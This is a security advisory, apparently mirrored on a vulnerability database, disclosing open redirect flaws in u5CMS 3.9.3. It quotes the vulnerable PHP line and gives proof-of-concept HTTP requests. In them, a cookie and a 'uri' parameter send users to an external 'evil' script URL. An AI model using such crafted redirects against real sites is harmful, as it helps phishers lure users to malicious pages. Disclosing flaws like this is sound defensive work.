Lucene search
K

u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities

🗓️ 09 Feb 2015 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 50 Views

u5CMS 3.9.3 Open Redirect in 'meta2.php' allows remote attackers to redirect users to arbitrary website

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2015-1578
19 Jun 202509:00
circl
CNVD
u5CMS Open Redirect Vulnerability
13 Feb 201500:00
cnvd
CVE
CVE-2015-1578
11 Feb 201519:00
cve
Cvelist
CVE-2015-1578
11 Feb 201519:00
cvelist
EUVD
EUVD-2015-1710
7 Oct 202500:30
euvd
Kaspersky
KLA10500 Multiple vulnerabilities in u5CMS
11 Feb 201500:00
kaspersky
NVD
CVE-2015-1578
11 Feb 201519:59
nvd
Prion
Open redirect
11 Feb 201519:59
prion
RedhatCVE
CVE-2015-1578
22 May 202503:04
redhatcve
<html><body><p>u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: Input passed via the 'uri' GET parameter in 'meta2.php' script and using
Cookie 'pidvesa' is not properly verified before being used to redirect users.
This can be exploited to redirect a user to an arbitrary website e.g. when a
user clicks a specially crafted link to the affected script hosted on a trusted
domain.

==============================================================================
\u5admin\pidvesa.php:
---------------------

Line 5: if ('<?php echo $_COOKIE['pidvesa']?>'!='') location.href='<?php echo $_COOKIE['pidvesa']?>'+'.php';

==============================================================================

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5227
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5227.php


29.12.2014

---


#1

This request example adds '.php' at the end to the pidvesa cookie value:

GET /u5cms/u5admin/pidvesa.php HTTP/1.1
Host: 10.0.50.3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mkmhuo3gquomkki4lurhap45o3; aclan=de; pidvesa=http://zeroscience.mk/evil/script;
Connection: keep-alive

 - To redirect to: http://zeroscience.mk/evil/script.php


--

#2

GET /u5cms/u5admin/meta2.php?uri=http://zeroscience.mk HTTP/1.1
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Feb 2015 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 25.8
EPSS0.04482
50